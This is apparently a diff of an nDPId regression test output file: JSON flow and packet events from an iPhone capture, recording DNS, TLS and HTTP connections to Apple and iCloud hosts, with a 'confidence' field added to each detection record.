 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454598387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454598387,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysAAAFAslesxAAAAALDC\/\/8mdwAAAgQFtAEDAwYBAQgKEd\/nTQAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1582454598402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454598402,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+34R+LmMwKgCEQG7xY+mDHMKDeq21aBScSAX2QAAAgQFrAEBCAr26Z7FEd\/m0wEDAwU="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1582454598404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454598404,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrIbAqAIREfi5jMWPAbsN6rbVpgxzC4AQBAuwVwAAAQEIChHf52v26Z7F"}
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598252,"flow_last_seen":1582454598405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598405,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598252,"flow_last_seen":1582454598405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598405,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGSmlfZRk1wKgCEQG7xZCMPaCSoKaYqKBScSBNPAAAAgQFrAQCCAoi0AShEd\/nTAEDAwc="}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1582454598412,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1582454598412,"pkt":"xGGLNYKpxiwDYGpkCABFAADIRW8AAEARr1PAqAIBwKgCEQA12KEAtAJjFxuBgAABAAUAAAAABG1lc3UFYXBwbGUDY29tAAABAAHADAAFAAEAAAfrAB8IbWVzdS1jZG4FYXBwbGUDY29tBmFrYWRucwNuZXQAwCwABQABAAAMoAAYCG1lc3UtY2RuDG9yaWdpbi1hcHBsZcA7wFcABQABAAAARAARBG1lc3UBZwdhYXBsaW1nwBfAewABAAEAAAAPAAQR\/WnKwHsAAQABAAAADwAEEf01yw=="}
-00745{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1582454598412,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}}
+00771{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1582454598412,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454598413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454598413,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/3DAqAIRX2UZNcWQAbugppiojD2gk4AQBAvpMwAAAQEIChHf524i0ASh"}
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598377,"flow_last_seen":1582454598414,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598414,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598377,"flow_last_seen":1582454598414,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598414,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598416,"flow_last_seen":1582454598416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454598416,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454598416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454598416,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWSAbt\/OqmMAAAAALDC\/\/8OTwAAAgQFtAEDAwcBAQgKEd\/ndwAAAAAEAgAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598418,"flow_last_seen":1582454598418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454598418,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454598418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454598418,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWTAbsyJO8VAAAAALDC\/\/8V2QAAAgQFtAEDAwcBAQgKEd\/neQAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454598426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454598426,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQBQwACbtSzNLJXrMqBScNC85AAAAgQFrAQCCAodNCSFEd\/nTQEDAwg="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454598427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454598427,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGslMRggIuwKgCEQG7xZHfrwWiGTrrGKBSqbCWRAAAAgQFrAQCCAq1T9HeEd\/nUwEDAw4="}
-00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":78,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598377,"flow_last_seen":1582454598449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598449,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":78,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598377,"flow_last_seen":1582454598449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598449,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454598453,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454598453,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZNpWNRgMiTvFqBScNC35wAAAgQFrAQCCAoAH8DDEd\/neQEDAwg="}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454598459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454598459,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZLy+qnpfzqpjaBScNDegAAAAgQFrAQCCAqK\/qiVEd\/ndwEDAwg="}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454598542,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454598542,"pkt":"xiwDYGpkxGGLNYKpCABFAABAIN8AAP8RFWvAqAIRwKgCAc50ADUALLvssQ8BAAABAAAAAAAAB2dhdGV3YXkGaWNsb3VkA2NvbQAAAQAB"}
-00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454598544,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454598544,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysAAAFAslesym7UszoAQCBZUCQAAAQEIChHf5+gdNCSF"}
-00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598387,"flow_last_seen":1582454598545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/hotspot-detect.html","code":0,"content_type":"","user_agent":"CaptiveNetworkSupport-390.60.1 wispr"}}
+00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598387,"flow_last_seen":1582454598545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/hotspot-detect.html","code":0,"content_type":"","user_agent":"CaptiveNetworkSupport-390.60.1 wispr"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1582454598545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454598545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZFvAqAIREYICLsWRAbsZOusY368Fo4AQBAtqWAAAAQEIChHf5\/C1T9He"}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598385,"flow_last_seen":1582454598545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598385,"flow_last_seen":1582454598545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWTAbsyJO8WaVjUYYAQBAtTNAAAAQEIChHf5\/cAH8DD"}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598418,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598418,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWSAbt\/OqmN8vqp6oAQBAt5ywAAAQEIChHf5\/eK\/qiV"}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598416,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598252,"flow_last_seen":1582454598558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598558,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
